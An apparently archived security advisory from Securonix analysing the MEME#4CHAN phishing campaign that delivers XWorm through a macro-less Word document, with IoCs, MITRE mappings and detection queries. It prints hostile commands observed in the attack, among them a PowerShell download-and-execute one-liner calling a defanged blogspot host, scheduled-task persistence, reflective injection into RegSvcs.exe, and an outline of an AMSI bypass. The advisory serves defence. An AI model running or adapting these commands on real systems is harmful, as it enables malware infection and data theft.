{ "id": "29d1a197-d4a0-45a8-84d8-7166ceea538e", "created_at": "2026-04-06T00:08:25.575901Z", "updated_at": "2026-04-10T13:12:43.451473Z", "deleted_at": null, "sha1_hash": "9da82963106b91cf0e93addc4504bf8bcd969f26", "title": "Securonix Threat Labs Security Advisory: Latest Update: Ongoing MEME#4CHAN Attack/Phishing Campaign uses Meme-Filled Code to Drop XWorm Payloads", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9269346, "plain_text": "Securonix Threat Labs Security Advisory: Latest Update: Ongoing\r\nMEME#4CHAN Attack/Phishing Campaign uses Meme-Filled Code to\r\nDrop XWorm Payloads\r\nArchived: 2026-04-05 21:34:46 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nTL;DR\r\nAn unusual attack/phishing campaign delivering malware while using meme-filled code and complex obfuscation methods\r\ncontinues dropping Xworm payloads for the last few months and is still ongoing today.\r\nIntro\r\nFor the last few months, an interesting and ongoing attack campaign was identified and tracked by the Securonix Threat\r\nResearch team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled\r\nPowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims. Today, we’ll dive into this\r\ncampaign by taking an in-depth technical analysis of the entire attack chain starting with the phishing email samples,\r\ncovering obfuscation methods, and ending with an analysis of the final binary payload that gets decoded from .NET\r\nassemblies in PowerShell.\r\nThe attack chain leveraging XWorm payloads was first reported by threat researchers at Elastic. Today, we will take a look\r\nat some new unique payloads along with new obfuscation methods used by the attackers that were not covered before. We\r\nwill also provide new samples, IoCs and detections which we’ve been tracking since the start of the campaign a few months\r\nago.\r\nThe attack begins with a malicious Microsoft Office Word document and appears to be targeting various businesses,\r\nincluding Germany / .de email addresses. Microsoft Word attachments have fallen out of favor since Microsoft decided to\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 1 of 17\n\ndisable macro execution by default, however today as we dive into one of the samples collected, attempted code execution\r\nfrom a macro-less document is still very much in use today.\r\nAttack chain overview\r\nThe [MEME#4CHAN] campaign follows a rather unique attack chain consisting of both PowerShell and JavaScript\r\nexecution originating from a malicious Word document file.\r\nCSharp code execution contained within the main PowerShell script is used to deliver the final payload which ends with\r\nXWorm v3.1 execution. Below is a diagram of the overall attack chain. We will dive into each portion of the attack chain in\r\ndepth as we continue.\r\nFigure 1: [MEME#4CHAN] attack chain\r\nInitial infection\r\nAs with many modern attacks we see these days, the MEME#4CHAN typically begins with a phishing email. The attacks\r\nappear to be patterned after a known fake hotel reservation phishing scheme. The goal is to get the company employee to\r\nopen the attached phishing document which will kick off the initial code execution portion of the attack. Typically the\r\nsubject, body and even contents of the lure attachment are designed to create a sense of urgency to mask any potentially\r\nunusual requests.\r\nPhishing email details\r\nIn one example, the phishing email contained the subject “Reservation For Room” with a brief message in the body\r\ncontaining a generic text containing room and booking requests. The email appears to be sent from\r\n“zoe[at]kbowlingslaw.com”, however after examining the header, the actual sender came from a Gmail address:\r\n“panelnew12[at]gmail.com”.\r\nWhat makes this particular phishing campaign especially interesting is the fact that the target email belonged to a German\r\ncompany involved in manufacturing. This could indicate that the attackers are not only specifically targeting hotels, but\r\nblasting out phishing emails using a generic corporate email list and hoping for the best. To bolster this theory, another\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 2 of 17\n\nphishing email our team intercepted was from the same Gmail address and contained the subject “Urgent booking for\r\nHoneymoon” and was targeted to a small German hospital clinic.\r\nMost of the phishing emails analyzed by the team followed the same pattern, so we’ll dive into one of these in depth.\r\nStage 1: Email attachment analysis: Details for booking.docx\r\nThroughout the rest of this article, we’ll follow the attack chain of one document, though others were overall similar and\r\nproduced the same final result. In this example, the email attachment is a single Microsoft Word document file named\r\n“Details for booking.docx”. When opened, a prompt to the user appears before any content is displayed asking the user if\r\nthey want to update the document with externally linked files.\r\nFigure 2: Details for booking.docx linked files prompt\r\nIf either of the prompts are clicked, the pop-up closes and we’re presented with what looks like stolen images of a bank\r\ndebit card as well as a driver’s license. Both cards appear to be from two unique French citizens.\r\nThe document contains no macros or discernable p-code which means that macro execution is not the attack vector for the\r\nphishing document.\r\nFigure 3: Details for booking.docx file contents\r\nRather than using macros to execute malicious VBscript, this document uses a known vulnerability from last year (CVE-2022-30190). In summary, this vulnerability works by embedding external objects contained in a relationship file within the\r\n.docx word file. These relationship files can reference external objects included inside the doc.\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 3 of 17\n\nIn this example, the document footer contained a shape object that was used maliciously. The shape object used the footer\r\nrelationship file “footer2.xml.rels” to fetch the external objects.\r\nFigure 4: Details for booking.docx external references\r\nNotice on the right side of the figure above that the relationship file contains two links to external resources.\r\nhxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093[.]docx\r\nThe referenced file 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx appears to be an empty MS document file containing\r\na single picture with a small white square. The same code execution tactic happens again with the same referenced Blogspot\r\nURL as the original.\r\nThe other URL contained in the original phishing document references the atom.xml file hosted on Usrfiles, a public file\r\nsharing service. This file redirects to another URL which downloads and executes a PowerShell script hosted at:\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt\r\nSome documents we observed executed PowerShell code directly contained within the atom.xml file, while others, as with\r\nthis case referenced a separate URL containing the malicious PowerShell code.\r\nStage 2: PowerShell execution\r\nThe PowerShell that gets executed at this stage is semi-obfuscated and contains quite a few functions which we’ll dive into\r\nfurther on. The code is rather interesting and contains memes, crass variable names and comments throughout, so you’ll\r\nhave to pardon the use of the blur tool throughout the next series of figures as we go through it and subsequent files.\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 4 of 17\n\nFigure 5: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – CSharp and initial execution\r\nThe script begins by stopping the RegSvcs and Msbuild processes. We’ll get into why this is important further down. After\r\nthat, a directory inside C:\\ProgramData\\ is created called MEMEMAN which is where most of the malware staging from\r\nthis point will happen.\r\nThe $NuclearDefusion variable contains a CSharp script that accomplishes a few tasks. First, at the beginning, there is a\r\ndeobfuscation function named £££ which is used to hex decode some of the other variables later on.\r\nTwo additional variables, each with their own PowerShell code are contained inside the $amsii variable contained in the JJJI\r\nfunction:\r\n$AMI: This variable contains a long hexadecimal string that is triple hex encoded. Once decoded, we’re presented with a\r\nsimple obfuscated AMSI bypass technique which uses Matt Graeber’s reflection method to crash the AMSI (Anti-malware\r\nScan Interface) instance for the current PowerShell session. This will prevent subsequent code from being scanned for\r\nmalicious content.\r\nFigure 6: $AMI – AMSI bypass techniques\r\nNext, a registry key is created under “HKCU:\\\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32”  with a default value set to “C:\\IDontExist.dll” This registry change also assists in\r\ndisabling AMSI by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that doesn’t exist.\r\n$DEF: This variable contains PowerShell code to once again disable AMSI using the same two methods as before, just\r\nobfuscated differently. Additionally, defender exclusions are created for pretty much everything on the host using the “Add-https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 5 of 17\n\nMpPreference” PowerShell module.\r\nFigure 7: $DEF – Code samples: Disable AMSI, Defender exclusions, and new local user\r\nTowards the end of the script, a new local user named “System32” with a password of 123 is created. The new local user is\r\nthen added to the administrators and Remote Desktop Users groups. And then lastly, Windows Firewall is disabled.\r\nMoving through the Csharp script, we run into another obfuscated variable called $CHOTAbheem which contains a long\r\nencoded string. Further down we see it leveraging the £££ function to decode it.\r\nFigure 8: Deobfuscated code behind $CHOTAbheemdecoded\r\nThe script above leverages the WScript.shell COM object “{40FC6ED5-2438-11CF-A3DB-080036F12502}” to execute the\r\n$NuclearDefusion variable which we’ll see written to disk later on. This takes us through the first half of the original\r\nPowerShell script.\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 6 of 17\n\nFigure 9: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – PowerShell code\r\nThe code referenced in the first half of the script is written to disk and saved in the  “C:\\ProgramData\\MEMEMAN”\r\ndirectory as “CypherDeptography.~+~” using the PowerShell [IO.File]::WriteAllText method.\r\nNext, let’s take a look at what’s hidden away behind the $allsave variable. Once decoded using the same method we used to\r\ndecode the $CHOTAbheem variable, we’re faced with a hugely obfuscated JScript one-liner as seen in the figure below.\r\nFigure 10: $allsave JScript and deobfuscated PowerShell code\r\nOnce decoded, the script behind $allsave is similar to that of $CHOTAbheem . However this appears to invoke a variable\r\nthat is referenced in the main script which points to:\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 7 of 17\n\nhxxps://backuphotelall.blogspot[.]com/atom.xml\r\nUnfortunately, we were not about to pull this script as the Blogspot URL was taken offline at some point. However, we can\r\nspeculate that it is similar to that of the original atom.xml script.\r\nNext down the list, we’ve got a repeating function (probably for redundancy) where the $shakalakaboomboom variable is\r\ndecoded. In the end, carving through the layers of obfuscation once again, it retrieves yet another atom.xml file from the\r\nfollowing URL:\r\nhxxps://3000allfitheyito.blogspot[.]com/atom.xml\r\nPersistence is established by writing the obfuscated JScript code to disk and saving it as \\ZeeNEWsTV\\UpdateEscan.js\r\nusing the WriteAllText method. A scheduled task is then created called EscanDissldo referencing the newly created file that\r\nruns once every 200 minutes.\r\nschtasks /create /sc MINUTE /mo 200 /tn EscanDissldo /F /tr “wscript.exe //b //e:jscript \r\nC:\\\\ProgramData\\\\MEMEMAN\\\\UpdateEscan.js”\r\nThe next level of persistence happens during the last 4 lines of code where all of the content from the staging directory\r\n(“C:\\ProgramData\\MEMEMAN\\“) is copied to the user’s startup directory. This is defined using\r\n“[environment]::getfolderpath(“Startup”)”\r\nLastly, the script deletes the CSharp decode script, or any file ending in *.~+~ from the startup directory.\r\nStage 3: Binary file execution\r\nCircling back to the C# script portion of the original PowerShell script, there are two variables which contain binary file\r\ndata. Both are heavily obfuscated .NET binaries which leverage the unlicenced version of .NET Reactor to hide the original\r\nsource code.\r\nBoth binary files are injected into the RegSvcs.exe or Msbuild.exe process using in-memory execution using .NET\r\nassemblies via reflection. For reference, the $Ripple variable contains the hexadecimal binary data for sssss.exe which we’ll\r\nbe going over further down.\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 8 of 17\n\nFigure 11: In-memory assembly execution\r\nThere is a good amount of obfuscation in the P4 function, however once decoded it is a bit easier to observe what the code is\r\nattempting to accomplish.\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},\r\n(“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe”, $Ripple)\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},\r\n(“C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe”, $Ripple)\r\n[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]},\r\n(“C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe”, $Ripple)\r\nBased on some of the hard-coded strings, this appears to be XWorm V3.1 which interestingly enough was recently cracked\r\nand published online.\r\nBinary file analysis: sssss.exe\r\nSince Xworm is pretty well known we won’t be diving in too deep into the binary analysis portion.The binary file was\r\nassembled with an original file name of sssss.exe and is hidden behind the variable $MEME2026. The variable is essentially\r\na long string of hexadecimal characters which when decoded make up the entire binary file.\r\nThe executable is overall quite small, at around 85KB and was compiled using VS. Taking a look at the metadata in the\r\nfigure below it appears to pattern itself off of what you might find for an AVG install file, though this executable  was not\r\ndigitally signed.\r\nFigure 12: sssss.exe binary file details\r\nOnce we were able to deobfuscate a majority of the script, we’re able to determine some basic functionality. In the figure\r\nbelow we see some connection parameters being defined. It establishes a connection to a remote HTTP server using a POST\r\nrequest using one of three user agents chosen at random:\r\n“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 9 of 17\n\n“Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0\r\nMobile/15E148 Safari/604.1”\r\n“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113\r\nSafari/537.36”\r\nFigure 13: sssss.exe connection parameters\r\nA unique ID is generated using the victim’s processor count, user name, machine name, OS Version,and drive total size. This\r\nis used to identify the victim host from the attacker’s C2 architecture.\r\nFrom a command and control standpoint, the RAT offers a large amount of attacker-initiated commands. Below is a table of\r\nthe command and a brief description of its intended functionality.\r\nCommand Details\r\nrec Restart application\r\nCLOSE Close application\r\nUninstall Purges all RAT files, registry keys, scheduled tasks then exits\r\nupdate Runs the uninstall function, decompresses file from byte stream, opens a new memory stream\r\nDW\r\nWrites a .ps1 file from the attacker’s server and executes it using the command: powershell.exe -\r\nExecutionPolicy Bypass -File “filename.ps1”\r\nFM\r\nTakes an assembly from a provided byte array, then creates an instance of the assembly’s entry point\r\ntype and invoke it.\r\nLN Downloads a file and executes it using Process.Start(filename).\r\nUrlopen Performs an HTTP GET request to a provided URL for the default browser\r\nUrlhide Same as Urlopen, but build the web connection within the binary itself, hidden from the user\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 10 of 17\n\nCommand Details\r\nPCShutdown\r\nShuts down the victim machine using the following command:\r\nshutdown.exe /f /s /t 0\r\nPCRestart\r\nRestarts the victim machine using the following command:\r\nshutdown.exe /f /r /t 0\r\nPCLogoff\r\nLogs off the user using the following command:\r\nshutdown.exe -L\r\nStartDDos Begins DDos to the target\r\nStopDDos Stops the DDos attack\r\nStartReport\r\nThis attempts to abort the existing thread and then create a new thread for the instance with passed in\r\nparameters\r\nStopReport Stops the newly created thread\r\nXchat Open a socket and send specified data to the attacker’s machine\r\nngrok Open a socket and use ngrok functionality\r\nplugin Unknown: Appears to check for the existence of “plugin” related data\r\nsavePlugin Unknown: processing of additional plugin-related data\r\nOfflineGet Performs connectivity check\r\nCap Captures the current user’s desktop\r\nMessageBox Sends a message to the logged in user using MessageBox.Show();\r\nOther functionality includes clipboard monitoring, command shell, DOS capabilities, disable/enable UAC, and the ability to\r\nthrow a BSOD.\r\nIn addition to the functionality above, the RAT also leverages WMI objects to pull additional data such as antivirus\r\ninformation, date and time information. While the connection strings were heavily obfuscated within the executable,\r\ndynamic analysis provided a connection with the following information:\r\n212.87.204[.]83:3000\r\nPort3000newspm.duckdns[.]org\r\nSome Possible Attribution Insights\r\nThe attack methodology is similar to that of TA558 where phishing emails were delivered targeting the hospitality industry.\r\nTA558 also typically uses a wide range of C2 campaign artifacts and payloads similar, but not positively in line with what\r\nwe witnessed through the MEME#4CHAN campaign.\r\nBased on the English meme-themed code and 4chan references, it’s likely that the malicious threat actor originates from a\r\ngroup of English-speaking origin, such as the UK or US. Some of the malicious attack activity appears to be targeting\r\nvictims in Germany.\r\nAdditional sample analysis\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 11 of 17\n\nIn addition to the attack chain above beginning with Details for booking.docx, the Securonix Threat Research team also\r\nidentified other connected samples, including:\r\nDocument C2 Infrastructure\r\nAutorização do\r\ndocumento.docx\r\nhxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-\r\npacked.xll/file\r\nhxxps://urlintimacygoombguch.blogspot[.]com/atom.xml\r\nPassport and Id for booking\r\ndetails.docx\r\nhxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file\r\nPost exploitation analysis and observations\r\nWe observed the attackers execute the following commands on our system. As you can see, executed commands originated\r\nfrom the RegSvcs.exe process, confirming the in-memory injection techniques seen in the original PowerShell script.\r\nProcess Command Line\r\nwinword.exe\r\nwinword.exe  /n “c:\\users\\[redacted]\\downloads\\autorização do documento.docx” /o “”           \r\nexplorer.exe      c:\\windows\\explorer.exe\r\nmshta.exe\r\nc:\\windows\\system32\\mshta.exe -embedding  svchost.exe      c:\\windows\\system32\\svchost.exe -k\r\ndcomlaunch -p\r\nregsvcs.exe\r\npowershell.exe -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}\r\n{0}’-f’ex’,’i’) | ping 127.0.0.1\r\nschtasks.exe\r\nSchtasks.exe /create /sc minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript\r\nc:\\\\programdata\\\\REDACTED\\\\windowsdefenderupdate.js”    powershell.exe   \r\n“c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe” -ep bypass -c\r\n(i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping 127.0.0.1\r\nC2 and infrastructure\r\nMuch of the infrastructure used in the MEME#4CHAN campaign was hosted from public file sharing services such as\r\nusrfiles and mediafire. Additionally, atom.xml files on random blogspot domains were used. Some either redirected to a .txt\r\nfile containing malicious PowerShell code while others contained the PowerShell code directly.\r\nThe following IP addresses and domains were observed as a part of the overall C2 infrastructure during [MEME#4CHAN]\r\ncampaign.\r\nC2 and Network IoCs\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_16620dd76e094b4888c85467a58e79df.txt\r\nhxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt\r\nhxxps://529f38d0-3744-4286-b484-be860d475d25.usrfiles[.]com/ugd/529f38_41875cf4c8844415994858b3623063f9.txt\r\nhttps://42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles.com/ugd/42502d_fb4a2f640cf14ab2a8bcbde16bd178ba.txt\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 12 of 17\n\nC2 and Network IoCs\r\nhxxps://powpowpowff.blogspot[.]com/atom.xml\r\nhxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml\r\nhxxps://backuphotelall.blogspot[.]com/atom.xml\r\nhxxps://3000allfitheyito.blogspot[.]com/atom.xml\r\nhxxps://urlintimacygoombguch.blogspot[.]com/atom.xml\r\nhxxps://port5000duki.blogspot[.]com/atom.xml\r\nhxxps://bakc5002.blogspot[.]com/atom.xml\r\nhxxps://billielishhui.blogspot[.]com/atom.xml\r\nhxxps://doccallingupdate.blogspot[.]com/atom.xml\r\nhxxps://urlpropogationintimitacyi[.]blogspot.com/atom.xml\r\nhxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file\r\nhxxps://www.mediafire.com/file/giv692dqvctosb3/50002023[.]txt/file\r\nhxxps://www.mediafire[.]com/file/q1zrci43zt8hlix/7000.txt/file\r\nhxxps://www.mediafire[.]com/file/79jzbqigitjp2v2\r\nport3000newspm.duckdns[.]org\r\n212.87.204[.]83:3000\r\nConclusion\r\nThe [MEME#4CHAN] campaign provided us with some interesting insights. Though phishing emails rarely use Microsoft\r\nOffice documents since Microsoft made the decision to disable macros by default, today we’re seeing proof that it is still\r\nimportant to be vigilant about malicious document files, especially in this case where there was no VBscript execution from\r\nmacros.\r\nIt’s likely that since several C2 domains are still active that this campaign is ongoing. Also, given the fact that XWorm v3.1\r\nwas recently cracked and released, it’s likely that activity surrounding this particular strain will only increase.\r\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments especially from those that are unexpected or are from outside the organization. Be\r\nextra vigilant with Microsoft document files, even if there are no macros present.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection\r\ncoverage.\r\nMonitor for the usage of potentially malicious file hosting websites such as mediafire and usrfiles.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK Matrix\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 13 of 17\n\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nT1204.001: User Execution: Malicious Link\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1055.009: Process Injection: Proc Memory\r\nT1620: Reflective Code Loading\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1053: Scheduled Task/Job\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nDetails for booking.docx f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744\r\nAutorização do documento.docx 9cd785dbcceced90590f87734b8a3dbc066a26bd90d4e4db9a480889731b6d2\r\nCard \u0026 Booking Details.docx 3c3e24c01a675b3b17bee9c8f560a33c3ecca8c44442fd5b3dd8c0f4429f279b\r\nPassport and Id for booking details.docx 6d86f36b2220e8d9580e6708856fa74f37f7aa35db1a708e17ecacf0de3d5d2e\r\n73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx db1185f24c56cadec1c85a33b0efeb2d803ff00abf4c9df1e00d860683068415\r\n529f38_ab5ac880c56841bca4889e2e53082ddf.docx 41c68aecada65a15f4a8bea52cc25033a1b73ff7340cd3865d55c61ded566e81\r\n73cceb_c6672ebf7c8e4edb9e3f2612ab056923.txt 292b5a8c61eb79633590b6b13c0b41388ccad3535b55ed822b887d6d15d61b\r\n73cceb_e5a698286daf43ac87b4544a35b1a482.txt 59d72ff91e94a2c762285cce3bcb3e94e8d14608c2eeecacdcd6fe720c3ad5f2\r\n73cceb_b2df5636b5c54a73b438fa5ae338326b.txt 9419d7a578338a714f976fb2b9eb320049422ec7059cedcc4a8baf144c4df41b\r\n73cceb_e5c443158f5b446daab366060229bc37.txt 2725a14da90a6bcbfde174df8b0e95179b617aa14ec07a2d1fc71000310ad91\r\n73cceb_69fbb28af79141d4b6bec17ff2cf1850.txt 4746941996305743c9d0bcb96ed4b2b930355cd8782098aa5600b421313143\r\n73cceb_33dedbe277af4ba48b81c1486becec3e.txt c443d754153180ebeee1106d5eecf1024e063413f3f92a29c6c95a08c6f2e633\r\n73cceb_33dedbe277af4ba48b81c1486becec3e.txt 1005feeff2ecfe6e53f53f63a2364de8418863d83e256322ca82e939dae95e45\r\n73cceb_a27333f1bf71425199c62379dc2c4fbf.txt 6005529195e6afac29d8c62091ee7990e92b7a80b391b03c34c8a8fbf019fce6\r\n637c10a8-1401-4193-bede-dc80e432f3b6-\r\ndom.html\r\nf0942afa08c509f58b4b9f02cae4581ebf712f2f1763f1a2ffb8f9d964e335ae\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 14 of 17\n\nFile Name SHA256 (IoC)\r\n529f38_03f0f1ffb57c407198e05107306a4f6f.txt d4fdc73d563605cadf1ded9b644f21e8dae0f65870890357e5bc554bbc66bf74\r\n529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56.txt 1b5ec95836cd52efa853ba3fa76d0849e4094b32048952a7ac0676d34f25177\r\n529f38_41875cf4c8844415994858b3623063f9.txt 1ae5589b6c358ff11a9555a7265ba5f0709be7a865e2cf51af04eb17b2a2ce18\r\n529f38_9ce24968dc7342deb680dad14f365bc5.txt 1a517a25d55aae6af13d025b1d1edee7fb185b90155f30e195f58cbf4c6b36fe\r\n529f38_532d9fab787f45a9a533a9be38cab909.txt d9a1c97646872be823bce7e37325f9869daa5593f3ced37024dc5188243639b\r\nexcelDNALibrary-AddIn64-packed.xll 90cb95264d0b555fe9a760de404196ac183a958c9cc1aad0689598e35fbb0c3\r\nsssss.exe 3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16\r\nbin.dll 4fc40af3b2e3f96e8013a7187e5cb4ce1a00a9528823f789cb8aca09c51143c6\r\n201871865 9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0\r\nSome Example of Relevant Securonix detection policies\r\nEDR-ALL-1038-RU\r\nEDR-ALL-730-ER\r\nEDR-ALL-30-ER\r\nCEDR-ALL-30-ER\r\nEDR-ALL-932-RU\r\nWEL-ALL-1070-RU\r\nEDR-ALL-979-RU\r\nEDR-ALL-351-RU\r\nWEL-ALL-1069-RU\r\nEDR-ALL-1086-RU\r\nEDR-ALL-1100-ER\r\nEDR-ALL-1215-ERR\r\nWEL-ALL-1186-ERR\r\nEDR-ALL-1209-RU\r\nPSH-ALL-231-RU\r\nPSH-ALL-227-RU\r\nPSH-ALL-314-RU\r\nRelevant Spotter queries\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (resourcecustomfield1\r\nCONTAINS “Set-MpPreference” OR resourcecustomfield1 CONTAINS “Add-MpPreference”) AND\r\n(resourcecustomfield1 CONTAINS “-DisableRealtimeMonitoring” OR resourcecustomfield1 CONTAINS “-\r\nDisableBehaviorMonitoring”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\ndestinationprocessname = “schtasks.exe” AND (resourcecustomfield1 CONTAINS “\\ProgramData\\” OR\r\nresourcecustomfield1 CONTAINS “\\Users\\” OR resourcecustomfield1 CONTAINS “\\Public\\” OR\r\nresourcecustomfield1 CONTAINS “\\AppData\\” OR resourcecustomfield1 CONTAINS “\\Desktop\\” OR\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/\r\nPage 15 of 17\n\nresourcecustomfield1 CONTAINS “\\Downloads\\” OR resourcecustomfield1 CONTAINS “\\Temp\\” OR\r\nresourcecustomfield1 CONTAINS “\\Tasks\\” OR resourcecustomfield1 CONTAINS “\\$Recycle”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\n(destinationprocessname = “reg.exe” OR destinationprocessname = “mshta.exe” OR destinationprocessname =\r\n“cscript.exe” OR destinationprocessname = “regsvr32.exe” OR destinationprocessname = “wscript.exe” OR\r\ndestinationprocessname = “schtasks.exe”) AND (resourcecustomfield1 CONTAINS ” Invoke-” OR\r\nresourcecustomfield1 CONTAINS “FromBase64String” OR resourcecustomfield1 CONTAINS “New-Object” OR\r\nresourcecustomfield1 CONTAINS ” IEX(” OR resourcecustomfield1 CONTAINS “|IEX” OR resourcecustomfield1\r\nCONTAINS ” bypass “)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “}{0}” OR\r\nmessage CONTAINS “} {0}”) AND message CONTAINS ” -f” AND (message NOT CONTAINS\r\n“WarningWriteDownRecoveryPasswordInsertExternalKeyRestart” AND message NOT CONTAINS\r\n“ErrorSidProtectorRequiresAdditionalRecoveryProtector” AND message NOT CONTAINS “=\\windows\\sentinel\\”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS\r\n“System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR\r\nmessage CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS\r\n“System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR\r\nmessage CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated\r\nby= Microsoft Corporation” AND message NOT CONTAINS “Generated by: Microsoft Corporation”)\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “Web Proxy”) AND (destinationaddress = “193.149.185[.]229”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS “73cceb_” AND requesturl\r\nCONTAINS “.txt”\r\nindex = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS\r\n“powpowpowff.blogspot[.]com” OR requesturl CONTAINS “huskidkifklaoksikfkfijsju.blogspot[.]com” 